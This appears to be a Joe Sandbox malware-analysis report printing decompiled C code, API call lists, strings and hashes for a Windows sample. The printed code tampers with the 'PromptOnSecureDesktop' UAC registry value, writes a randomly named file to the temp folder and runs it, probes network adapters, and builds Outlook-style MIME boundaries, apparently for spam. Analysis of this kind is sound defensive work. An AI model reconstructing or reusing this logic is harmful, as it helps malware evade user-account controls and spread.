				_t173 = __ecx;
				_v16 = 0;
				if(E00407DD6(__edx) != 0) {
					return 1;
				}
				_t88 = E00406EC3();
				__eflags = _t88;
				if(_t88 != 0) {
					_v8 = 0;
					__eflags =  *0x412c3c; // 0x0
					if(__eflags == 0) {
						goto L37;
					}
					__eflags =  *0x412c38; // 0x0
					if(__eflags == 0) {
						goto L37;
					}
					_t130 = E00402544(0x4122f8,  &E004106AC, 0x2e, 0xe4, 0xc8);
					_t198 = _t196 + 0x14;
					_t131 = RegOpenKeyExA(0x80000001, _t130, 0, 0x101,  &_v12);
					__eflags = _t131;
					if(_t131 != 0) {
						L31:
						_t133 = E00402544(0x4122f8,  &E004106AC, 0x2e, 0xe4, 0xc8);
						_t198 = _t198 + 0x14;
						_t134 = RegOpenKeyExA(0x80000001, _t133, 0, 0x103,  &_v12);
						__eflags = _t134;
						if(_t134 != 0) {
							L35:
							E0040EE2A(_t173, 0x4122f8, 0, 0x100);
							_t196 = _t198 + 0xc;
							__eflags = _v8;
							if(_v8 != 0) {
								E0040EC2E(_v8);
							}
							goto L37;
						}
						_t188 =  *0x412c3c; // 0x0
						_t137 = _t188;
						_t44 =  &(_t137[1]); // 0x1
						_t173 = _t44;
						do {
							_t181 =  *_t137;
							_t137 =  &(_t137[1]);
							__eflags = _t181;
						} while (_t181 != 0);
						_t139 = _t137 - _t173 + 1;
						__eflags = _t139;
						RegSetValueExA(_v12,  *0x412c38, 0, 1, _t188, _t139);
						RegCloseKey(_v12);
						goto L35;
					}
					_t144 = RegQueryValueExA(_v12,  *0x412c38, 0,  &_v28, 0,  &_v16);
					__eflags = _t144;
					if(_t144 == 0) {
						__eflags = _v28 - 1;
						if(_v28 == 1) {
							__eflags = _v16;
							if(_v16 > 0) {
								_t147 = E0040EBCC(_v16);
								_pop(_t173);
								_v8 = _t147;
								__eflags = _t147;
								if(_t147 != 0) {
									_t173 =  &_v16;
									_t149 = RegQueryValueExA(_v12,  *0x412c38, 0,  &_v28, _t147,  &_v16);
									__eflags = _t149;
									if(_t149 != 0) {
										E0040EC2E(_v8);
										_pop(_t173);
										_v8 = 0;
									}
								}
							}
						}
					}
					RegCloseKey(_v12);
					__eflags = _v8;
					if(_v8 != 0) {
						_t146 = E0040EED1(_v8,  *0x412c3c);
						_pop(_t173);
						__eflags = _t146;
						if(_t146 == 0) {
							goto L35;
						}
					}
					goto L31;
				} else {
					_t153 = E004073FF(_t173, 0x410264, 0, 0,  &_v388,  &_v60);
					_t199 = _t196 + 0x14;
					__eflags = _t153;
					if(_t153 <= 0) {
						L19:
						_t91 = 0;
						L56:
						return _t91;
					}
					__eflags = _v388;
					if(_v388 == 0) {
						goto L19;
					}
					__eflags = _v60;
					if(_v60 == 0) {
						goto L19;
					} else {
						_t154 =  &_v388;
						_t181 = _t154 + 1;
						do {
							_t180 =  *_t154;
							_t154 = _t154 + 1;
							__eflags = _t180;
						} while (_t180 != 0);
						_t156 = _t195 + _t154 - _t181 - 0x181;
						__eflags =  *_t156 - 0x5c;
						if( *_t156 == 0x5c) {
							 *_t156 = 0;
						}
						__eflags =  *0x412159 - 0x60;
						if( *0x412159 < 0x60) {
							L18:
							E0040EE2A(_t180, 0x4122f8, 0, 0x100);
							_t196 = _t199 + 0xc;
							L37:
							_v20 = 0;
							_v8 = 0;
							__eflags =  *0x4121a8; // 0x0
							if(__eflags == 0) {
								L42:
								__eflags =  *0x412cd8; // 0x0
								if(__eflags != 0) {
									L46:
									_t89 = E00406BA7(0x412cd8);
									_pop(_t174);
									__eflags = _t89;
									if(_t89 == 0) {
										L52:
										 *0x412cd8 = 0;
										L53:
										__eflags = _v8;
										if(_v8 != 0) {
											E0040EC2E(_v8);
										}
										_t91 = 1;
										__eflags = 1;
										goto L56;
									}
									_t93 = E00407E2F(_t181);
									__eflags = _t93;
									if(_t93 != 0) {
										L51:
										DeleteFileA(0x412cd8);
										goto L52;
									}
									_t193 = 0x44;
									E0040EE2A(_t174,  &_v128, 0, _t193);
									_v128.cb = _t193;
									E0040EE2A(_t174,  &_v44, 0, 0x10);
									_v428 = 0x22;
									lstrcpyA( &_v427, 0x412cd8);
									_t102 = lstrlenA( &_v428);
									 *((char*)(_t195 + _t102 - 0x1a8)) = 0x22;
									 *((char*)(_t195 + _t102 - 0x1a7)) = 0;
									E00407FCF(_t174);
									_t107 = CreateProcessA(0,  &_v428, 0, 0, 0, 0x8000000, 0, 0,  &_v128,  &_v44);
									__eflags = _t107;
									if(_t107 == 0) {
										E00407EE6(_t174);
										E00407EAD(_t181, __eflags, 0);
										goto L51;
									}
									CloseHandle(_v44.hThread);
									CloseHandle(_v44);
									goto L53;
								}
								GetTempPathA(0x12c, 0x412cd8);
								_t113 = E00408274(0x412cd8);
								_pop(_t177);
								_v24 = _t113;
								_t116 = (E0040ECA5() & 0x00000003) + 5;
								_v20 = _t116;
								__eflags = _t116;
								if(_t116 <= 0) {
									L45:
									_t117 = E00402544(0x4122f8, 0x410694, 5, 0xe4, 0xc8);
									_t69 = _v24 + 0x412cd8; // 0x0
									E0040EF00(_t69, _t117);
									E0040EE2A(_t177, 0x4122f8, 0, 0x100);
									_t196 = _t196 + 0x28;
									goto L46;
								} else {
									goto L44;
								}
								do {
									L44:
									_t122 = E0040ECA5();
									_t177 = 0x1a;
									_t181 = _t122 % _t177 + 0x61;
									_v24 = _v24 + 1;
									_v20 = _v20 - 1;
									 *((char*)(_v24 + 0x412cd8)) = _t122 % _t177 + 0x61;
									__eflags = _v20;
								} while (_v20 > 0);
								goto L45;
							}
							_t126 = E0040675C(0x4121a8,  &_v20, 0);
							_t196 = _t196 + 0xc;
							_v8 = _t126;
							__eflags =  *0x4121a8; // 0x0
							if(__eflags == 0) {
								goto L42;
							}
							__eflags = _t126;
							if(_t126 == 0) {
								goto L42;
							}
							__eflags = _v20 -  *0x4121a4; // 0x0
							if(__eflags != 0) {
								goto L42;
							}
							_t128 = E004024C2(_v8, _t127, 0);
							_t196 = _t196 + 0xc;
							__eflags =  *0x4122d4 - _t128; // 0x0
							if(__eflags == 0) {
								goto L53;
							}
							goto L42;
						}
						_t189 = 4;
						_v8 = 0;
						_v16 = _t189;
						_t159 = E00402544(0x4122f8,  &E00410710, 0x35, 0xe4, 0xc8);
						_t199 = _t199 + 0x14;
						_t160 = RegOpenKeyExA(0x80000002, _t159, 0, 0x103,  &_v12);
						__eflags = _t160;
						if(_t160 != 0) {
							goto L18;
						}
						_t165 = RegQueryValueExA(_v12,  &_v388, 0,  &_v28,  &_v8,  &_v16);
						__eflags = _t165;
						if(_t165 != 0) {
							L16:
							_v8 = 0;
							RegSetValueExA(_v12,  &_v388, 0, _t189,  &_v8, _t189);
							L17:
							RegCloseKey(_v12);
							goto L18;
						}
						__eflags = _v28 - _t189;
						if(_v28 != _t189) {
							goto L16;
						}
						__eflags = _v16 - _t189;
						if(_v16 != _t189) {
							goto L16;
						}
						__eflags = _v8;
						if(_v8 == 0) {
							goto L17;
						}
						goto L16;
					}
				}
			}





















































                                                                                0x00408328
                                                                                0x00408328
                                                                                0x00408334
                                                                                0x0040833e
                                                                                0x00000000
                                                                                0x00408342
                                                                                0x0040834a
                                                                                0x00408354
                                                                                0x00408356
                                                                                0x0040846b
                                                                                0x0040846e
                                                                                0x00408474
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040847a
                                                                                0x00408480
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004084a2
                                                                                0x004084ad
                                                                                0x004084b6
                                                                                0x004084b8
                                                                                0x004084ba
                                                                                0x00408543
                                                                                0x0040855f
                                                                                0x00408564
                                                                                0x0040856d
                                                                                0x0040856f
                                                                                0x00408571
                                                                                0x004085a5
                                                                                0x004085ac
                                                                                0x004085b1
                                                                                0x004085b4
                                                                                0x004085b7
                                                                                0x004085bc
                                                                                0x004085c1
                                                                                0x00000000
                                                                                0x004085b7
                                                                                0x00408573
                                                                                0x00408579
                                                                                0x0040857b
                                                                                0x0040857b
                                                                                0x0040857e
                                                                                0x0040857e
                                                                                0x00408580
                                                                                0x00408581
                                                                                0x00408581
                                                                                0x00408587
                                                                                0x00408587
                                                                                0x00408596
                                                                                0x0040859f
                                                                                0x00000000
                                                                                0x0040859f
                                                                                0x004084d3
                                                                                0x004084d9
                                                                                0x004084db
                                                                                0x004084dd
                                                                                0x004084e1
                                                                                0x004084e3
                                                                                0x004084e6
                                                                                0x004084eb
                                                                                0x004084f0
                                                                                0x004084f1
                                                                                0x004084f4
                                                                                0x004084f6
                                                                                0x004084f8
                                                                                0x0040850b
                                                                                0x00408511
                                                                                0x00408513
                                                                                0x00408518
                                                                                0x0040851d
                                                                                0x0040851e
                                                                                0x0040851e
                                                                                0x00408513
                                                                                0x004084f6
                                                                                0x004084e6
                                                                                0x004084e1
                                                                                0x00408524
                                                                                0x0040852a
                                                                                0x0040852d
                                                                                0x00408538
                                                                                0x0040853e
                                                                                0x0040853f
                                                                                0x00408541
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00408541
                                                                                0x00000000
                                                                                0x0040835c
                                                                                0x0040836e
                                                                                0x00408373
                                                                                0x00408376
                                                                                0x00408378
                                                                                0x00408464
                                                                                0x00408464
                                                                                0x00408779
                                                                                0x00000000
                                                                                0x0040877a
                                                                                0x0040837e
                                                                                0x00408384
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040838a
                                                                                0x0040838d
                                                                                0x00000000
                                                                                0x00408393
                                                                                0x00408393
                                                                                0x00408399
                                                                                0x0040839c
                                                                                0x0040839c
                                                                                0x0040839e
                                                                                0x0040839f
                                                                                0x0040839f
                                                                                0x004083a5
                                                                                0x004083ac
                                                                                0x004083af
                                                                                0x004083b1
                                                                                0x004083b1
                                                                                0x004083b3
                                                                                0x004083ba
                                                                                0x00408450
                                                                                0x00408457
                                                                                0x0040845c
                                                                                0x004085c2
                                                                                0x004085c2
                                                                                0x004085c5
                                                                                0x004085c8
                                                                                0x004085ce
                                                                                0x00408615
                                                                                0x0040861a
                                                                                0x00408620
                                                                                0x004086a7
                                                                                0x004086a8
                                                                                0x004086ad
                                                                                0x004086ae
                                                                                0x004086b0
                                                                                0x00408762
                                                                                0x00408762
                                                                                0x00408768
                                                                                0x00408768
                                                                                0x0040876b
                                                                                0x00408770
                                                                                0x00408775
                                                                                0x00408778
                                                                                0x00408778
                                                                                0x00000000
                                                                                0x00408778
                                                                                0x004086b6
                                                                                0x004086bb
                                                                                0x004086bd
                                                                                0x0040875b
                                                                                0x0040875c
                                                                                0x00000000
                                                                                0x0040875c
                                                                                0x004086c5
                                                                                0x004086cc
                                                                                0x004086d8
                                                                                0x004086db
                                                                                0x004086eb
                                                                                0x004086f2
                                                                                0x004086ff
                                                                                0x00408705
                                                                                0x0040870d
                                                                                0x00408714
                                                                                0x00408733
                                                                                0x00408739
                                                                                0x0040873b
                                                                                0x0040874f
                                                                                0x00408755
                                                                                0x00000000
                                                                                0x0040875a
                                                                                0x00408746
                                                                                0x0040874b
                                                                                0x00000000
                                                                                0x0040874b
                                                                                0x0040862c
                                                                                0x00408633
                                                                                0x00408638
                                                                                0x00408639
                                                                                0x00408644
                                                                                0x00408647
                                                                                0x0040864a
                                                                                0x0040864c
                                                                                0x00408671
                                                                                0x00408683
                                                                                0x0040868c
                                                                                0x00408693
                                                                                0x0040869f
                                                                                0x004086a4
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040864e
                                                                                0x0040864e
                                                                                0x0040864e
                                                                                0x00408657
                                                                                0x0040865d
                                                                                0x00408660
                                                                                0x00408663
                                                                                0x00408666
                                                                                0x0040866c
                                                                                0x0040866c
                                                                                0x00000000
                                                                                0x0040864e
                                                                                0x004085da
                                                                                0x004085df
                                                                                0x004085e2
                                                                                0x004085e5
                                                                                0x004085eb
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004085ed
                                                                                0x004085ef
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004085f4
                                                                                0x004085fa
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00408601
                                                                                0x00408606
                                                                                0x00408609
                                                                                0x0040860f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040860f
                                                                                0x004083c2
                                                                                0x004083df
                                                                                0x004083e2
                                                                                0x004083e5
                                                                                0x004083ea
                                                                                0x004083f3
                                                                                0x004083f9
                                                                                0x004083fb
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00408414
                                                                                0x0040841a
                                                                                0x0040841c
                                                                                0x0040842d
                                                                                0x0040843e
                                                                                0x00408441
                                                                                0x00408447
                                                                                0x0040844a
                                                                                0x00000000
                                                                                0x0040844a
                                                                                0x0040841e
                                                                                0x00408421
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00408423
                                                                                0x00408426
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00408428
                                                                                0x0040842b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040842b
                                                                                0x0040838d

                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 004083F3
                                                                                • RegQueryValueExA.ADVAPI32(00410750,?,00000000,?,00408893,?,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 00408414
                                                                                • RegSetValueExA.ADVAPI32(00410750,?,00000000,00000004,00408893,00000004,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 00408441
                                                                                • RegCloseKey.ADVAPI32(00410750,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 0040844A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Value$CloseOpenQuery
                                                                                • String ID: PromptOnSecureDesktop$localcfg
                                                                                • API String ID: 237177642-1678164370
                                                                                • Opcode ID: f0e8bc001febcaf3aa79265d78dfa7c2bcbced2000b5ff9bfcb5f44e60df388c
                                                                                • Instruction ID: 84ba07e5042139a9063b988de9b3f7486f2cd5d6c0453319c527b22e45c4d953
                                                                                • Opcode Fuzzy Hash: f0e8bc001febcaf3aa79265d78dfa7c2bcbced2000b5ff9bfcb5f44e60df388c
                                                                                • Instruction Fuzzy Hash: DAC1D2B1D00109BEEB11ABA0DE85EEF7BBCEB04304F14447FF544B2191EA794E948B69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040199C Relevance: 29.9, APIs: 11, Strings: 6, Instructions: 106memorylibraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 54%
                                                                                			E0040199C(void* __eax) {
				long _v8;
				_Unknown_base(*)()* _v12;
				struct HINSTANCE__* _v16;
				char _v20;
				void* _v24;
				long _v28;
				_Unknown_base(*)()* _t30;
				intOrPtr _t32;
				void* _t34;
				void* _t41;
				struct HINSTANCE__* _t48;
				_Unknown_base(*)()* _t49;
				void* _t50;

				_v20 = 0;
				_v28 = 0;
				__imp__#11("123.45.67.89");
				_v24 = __eax;
				_t48 = LoadLibraryA("Iphlpapi.dll");
				_v16 = _t48;
				if(_t48 != 0) {
					_v12 = GetProcAddress(_t48, "GetAdaptersInfo");
					_t49 = GetProcAddress(_t48, "GetIfEntry");
					_t30 = GetProcAddress(_v16, "GetBestInterface");
					if(_v12 == 0 || _t49 == 0 || _t30 == 0) {
						FreeLibrary(_v16);
						goto L21;
					} else {
						 *_t30(_v24,  &_v20);
						_t34 = GetProcessHeap();
						_v24 = _t34;
						if(_t34 == 0) {
							L21:
							_t32 = 0;
							L22:
							return _t32;
						}
						_t50 = HeapAlloc(_t34, 0, 0x288);
						if(_t50 == 0) {
							goto L21;
						}
						_push( &_v8);
						_push(_t50);
						_v8 = 0x288;
						if(_v12() == 0x6f) {
							_t50 = HeapReAlloc(_v24, 0, _t50, _v8);
						}
						if(_t50 == 0) {
							L18:
							FreeLibrary(_v16);
							if(_v28 == 0) {
								goto L21;
							}
							_t32 = 1;
							goto L22;
						} else {
							_push( &_v8);
							_push(_t50);
							if(_v12() != 0) {
								goto L18;
							}
							_t41 = _t50;
							while( *((intOrPtr*)(_t41 + 0x19c)) != _v20) {
								_t41 =  *_t41;
								if(_t41 != 0) {
									continue;
								}
								L17:
								HeapFree(_v24, 0, _t50);
								goto L18;
							}
							if( *((intOrPtr*)(_t41 + 0x1a0)) != 6) {
								_v28 = 1;
							}
							goto L17;
						}
					}
				}
				return 0;
			}
















                                                                                0x004019ab
                                                                                0x004019ae
                                                                                0x004019b1
                                                                                0x004019bc
                                                                                0x004019c5
                                                                                0x004019c7
                                                                                0x004019cc
                                                                                0x004019ea
                                                                                0x004019f7
                                                                                0x004019f9
                                                                                0x004019fe
                                                                                0x00401ab6
                                                                                0x00000000
                                                                                0x00401a14
                                                                                0x00401a1b
                                                                                0x00401a1d
                                                                                0x00401a23
                                                                                0x00401a28
                                                                                0x00401abc
                                                                                0x00401abc
                                                                                0x00401abe
                                                                                0x00000000
                                                                                0x00401abe
                                                                                0x00401a3c
                                                                                0x00401a40
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00401a45
                                                                                0x00401a46
                                                                                0x00401a47
                                                                                0x00401a50
                                                                                0x00401a60
                                                                                0x00401a60
                                                                                0x00401a67
                                                                                0x00401aa1
                                                                                0x00401aa4
                                                                                0x00401aad
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00401aaf
                                                                                0x00000000
                                                                                0x00401a69
                                                                                0x00401a6c
                                                                                0x00401a6d
                                                                                0x00401a73
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00401a75
                                                                                0x00401a77
                                                                                0x00401a82
                                                                                0x00401a86
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00401a96
                                                                                0x00401a9b
                                                                                0x00000000
                                                                                0x00401a9b
                                                                                0x00401a91
                                                                                0x00401a93
                                                                                0x00401a93
                                                                                0x00000000
                                                                                0x00401a91
                                                                                0x00401a67
                                                                                0x004019fe
                                                                                0x00000000

                                                                                APIs
                                                                                • inet_addr.WS2_32(123.45.67.89), ref: 004019B1
                                                                                • LoadLibraryA.KERNEL32(Iphlpapi.dll,?,?,?,?,00000001,00401E9E), ref: 004019BF
                                                                                • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 004019E2
                                                                                • GetProcAddress.KERNEL32(00000000,GetIfEntry), ref: 004019ED
                                                                                • GetProcAddress.KERNEL32(?,GetBestInterface), ref: 004019F9
                                                                                • GetProcessHeap.KERNEL32(?,?,?,?,00000001,00401E9E), ref: 00401A1D
                                                                                • HeapAlloc.KERNEL32(00000000,00000000,00000288,?,?,?,?,00000001,00401E9E), ref: 00401A36
                                                                                • HeapReAlloc.KERNEL32(?,00000000,00000000,00401E9E,?,?,?,?,00000001,00401E9E), ref: 00401A5A
                                                                                • HeapFree.KERNEL32(?,00000000,00000000,?,?,?,?,00000001,00401E9E), ref: 00401A9B
                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,00000001,00401E9E), ref: 00401AA4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$AddressProc$AllocFreeLibrary$LoadProcessinet_addr
                                                                                • String ID: 123.45.67.89$GetAdaptersInfo$GetBestInterface$GetIfEntry$Iphlpapi.dll$localcfg
                                                                                • API String ID: 835516345-270533642
                                                                                • Opcode ID: 52436911476c130446cd143f44c65522dc478156bb7ce270366fd521237d2269
                                                                                • Instruction ID: c689a3d9ae3379b0bfe51822f68a21815d588b76a9689f39126eb657c90dfffc
                                                                                • Opcode Fuzzy Hash: 52436911476c130446cd143f44c65522dc478156bb7ce270366fd521237d2269
                                                                                • Instruction Fuzzy Hash: 39313E32A01219AFCF119FE4DD888AFBBB9EB45311B24457BE501B2260D7B94E819F58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0208858F Relevance: 28.4, APIs: 14, Strings: 2, Instructions: 361registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,00000000,00000103,?), ref: 0208865A
                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00000000,00000103,?), ref: 0208867B
                                                                                • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004,?,?,00000000,00000103,?), ref: 020886A8
                                                                                • RegCloseKey.ADVAPI32(?,?,?,00000000,00000103,?), ref: 020886B1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Value$CloseOpenQuery
                                                                                • String ID: "$PromptOnSecureDesktop
                                                                                • API String ID: 237177642-3108538426
                                                                                • Opcode ID: 1c60b81768065cc7cafd43d65e6870f876b06d8eccb24c6c2cb771a703b3980a
                                                                                • Instruction ID: bc47f7fb476407937a73f3e942d2dbb13ee43b126af854ff649f120592a1976a
                                                                                • Opcode Fuzzy Hash: 1c60b81768065cc7cafd43d65e6870f876b06d8eccb24c6c2cb771a703b3980a
                                                                                • Instruction Fuzzy Hash: A6C1A37190034DBEEB52BBA4DD84EEF7BBDEB04300F548065F685E2050E7B04A94AF65
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 020814E7 Relevance: 23.2, APIs: 9, Strings: 4, Instructions: 417stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ShellExecuteExW.SHELL32(?), ref: 02081601
                                                                                • lstrlenW.KERNEL32(-00000003), ref: 020817D8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExecuteShelllstrlen
                                                                                • String ID: $<$@$D
                                                                                • API String ID: 1628651668-1974347203
                                                                                • Opcode ID: 03adf1138caabce6029c68f91071d7d17f6d9527f2eb0b017a6edce7519f1441
                                                                                • Instruction ID: 0f6bd7a36943a8d09cdd4f973a34866938da563235029bb0c1e0df911e7ca785
                                                                                • Opcode Fuzzy Hash: 03adf1138caabce6029c68f91071d7d17f6d9527f2eb0b017a6edce7519f1441
                                                                                • Instruction Fuzzy Hash: 35F168B15083419FD721EF64C888BABBBE5FF88304F00892DF6DA97290D7B49945CB56
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02087666 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 345registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(80000002,00000000,00020119,?), ref: 020876D9
                                                                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000101,?), ref: 02087757
                                                                                • RegQueryValueExA.ADVAPI32(?,00000000,?,00000000,?,?,00000104), ref: 0208778F
                                                                                • ___ascii_stricmp.LIBCMT ref: 020878B4
                                                                                • RegCloseKey.ADVAPI32(?), ref: 0208794E
                                                                                • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 0208796D
                                                                                • RegCloseKey.ADVAPI32(?), ref: 0208797E
                                                                                • RegCloseKey.ADVAPI32(?), ref: 020879AC
                                                                                • RegCloseKey.ADVAPI32(?), ref: 02087A56
                                                                                  • Part of subcall function 0208F40C: lstrlen.KERNEL32(000000E4,00000000,PromptOnSecureDesktop,000000E4,0208772A,?), ref: 0208F414
                                                                                • GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 020879F6
                                                                                • RegCloseKey.ADVAPI32(?), ref: 02087A4D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Close$Open$AttributesEnumFileQueryValue___ascii_stricmplstrlen
                                                                                • String ID: "$PromptOnSecureDesktop
                                                                                • API String ID: 3433985886-3108538426
                                                                                • Opcode ID: 1023eff4b56b9a7853b73631c2f3480fec1a45e58b56effd08988566cadd104d
                                                                                • Instruction ID: 603c553e287cb5a6f6b7337978acb837deb77f8555097ea9a8dff60121f7eb62
                                                                                • Opcode Fuzzy Hash: 1023eff4b56b9a7853b73631c2f3480fec1a45e58b56effd08988566cadd104d
                                                                                • Instruction Fuzzy Hash: F1C1B675900319AFDB12ABA4DC44FEFBBB9EF49310F2440A5E584E6164EB71DA80DF60
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02082CC9 Relevance: 21.2, APIs: 14, Instructions: 194memorynetworkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 02082CED
                                                                                • socket.WS2_32(00000002,00000002,00000011), ref: 02082D07
                                                                                • htons.WS2_32(00000000), ref: 02082D42
                                                                                • select.WS2_32 ref: 02082D8F
                                                                                • recv.WS2_32(?,00000000,00001000,00000000), ref: 02082DB1
                                                                                • GetProcessHeap.KERNEL32(00000000,00000108), ref: 02082E62
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$AllocateProcesshtonsrecvselectsocket
                                                                                • String ID:
                                                                                • API String ID: 127016686-0
                                                                                • Opcode ID: 34b12e3987a7911b0151bc10fc282e4d0fd91c502d2533c711cf9584e7c9b6b6
                                                                                • Instruction ID: e6a871217094e9b3b903aa19e4cc1c22140071cf43365d648cdeb6415f53aa08
                                                                                • Opcode Fuzzy Hash: 34b12e3987a7911b0151bc10fc282e4d0fd91c502d2533c711cf9584e7c9b6b6
                                                                                • Instruction Fuzzy Hash: 0161D072504385AFC321BF64DC08BABBBE8EB48745F004819FDC497251D7B5D880EBAA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040AD89 Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 121timeCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 96%
                                                                                			E0040AD89(void* __ecx, void* __eflags) {
				signed int _t48;
				signed int _t50;
				void* _t53;
				intOrPtr _t55;
				void* _t76;
				signed int _t77;
				void* _t81;
				CHAR* _t92;
				void* _t94;
				void* _t96;
				void* _t98;

				_t76 = __ecx;
				_t94 = _t96 - 0x74;
				GetLocalTime(_t94 + 0x50);
				SystemTimeToFileTime(_t94 + 0x50, _t94 + 0x64);
				E0040EE2A(_t76, _t94 - 0x110, 0, 0x80);
				E0040AD08(_t94 - 0x110);
				_t98 = _t96 - 0x184 + 0x10;
				if(E004030B5() == 0) {
					 *((intOrPtr*)(_t94 + 0x6c)) = "127.0.0.1";
				} else {
					_push(_t94 - 0x90);
					 *((intOrPtr*)(_t94 + 0x6c)) = E0040A7A3(_t47, _t47);
				}
				_t48 = E0040ECA5();
				_t77 = 0xe;
				_t50 = E0040ECA5();
				_t92 = "%OUTLOOK_BND_";
				 *((intOrPtr*)(_t94 + 0x70)) = (_t50 & 0x00000001) + _t48 % _t77 + 0xb;
				_t53 = E0040EE95( *((intOrPtr*)(_t94 + 0x7c)), _t92);
				while(1) {
					_t103 = _t53;
					if(_t53 == 0) {
						break;
					}
					_t55 = E0040EDAC(_t53 + 0xd);
					_t81 =  *((intOrPtr*)(_t94 + 0x70)) + _t55;
					__eflags = _t81;
					 *((intOrPtr*)(_t94 + 0x60)) = _t55;
					wsprintfA(_t94 - 0x70, "----=_NextPart_%03d_%04X_%08.8lX.%08.8lX", _t55, _t81,  *((intOrPtr*)(_t94 + 0x68)),  *(_t94 + 0x64));
					wsprintfA(_t94 + 0x10, "%s%d", _t92,  *((intOrPtr*)(_t94 + 0x60)));
					E0040EF7C(__eflags,  *((intOrPtr*)(_t94 + 0x7c)), _t94 + 0x10, _t94 - 0x70, 0x3e800, 0);
					_t98 = _t98 + 0x40;
					_t53 = E0040EE95( *((intOrPtr*)(_t94 + 0x7c)), _t92);
				}
				wsprintfA(_t94 - 0x70, "%04x%08.8lx$%08.8lx$%08x@%s",  *((intOrPtr*)(_t94 + 0x70)) + 3,  *((intOrPtr*)(_t94 + 0x68)),  *(_t94 + 0x64),  *((intOrPtr*)(_t94 + 0x6c)), _t94 - 0x110);
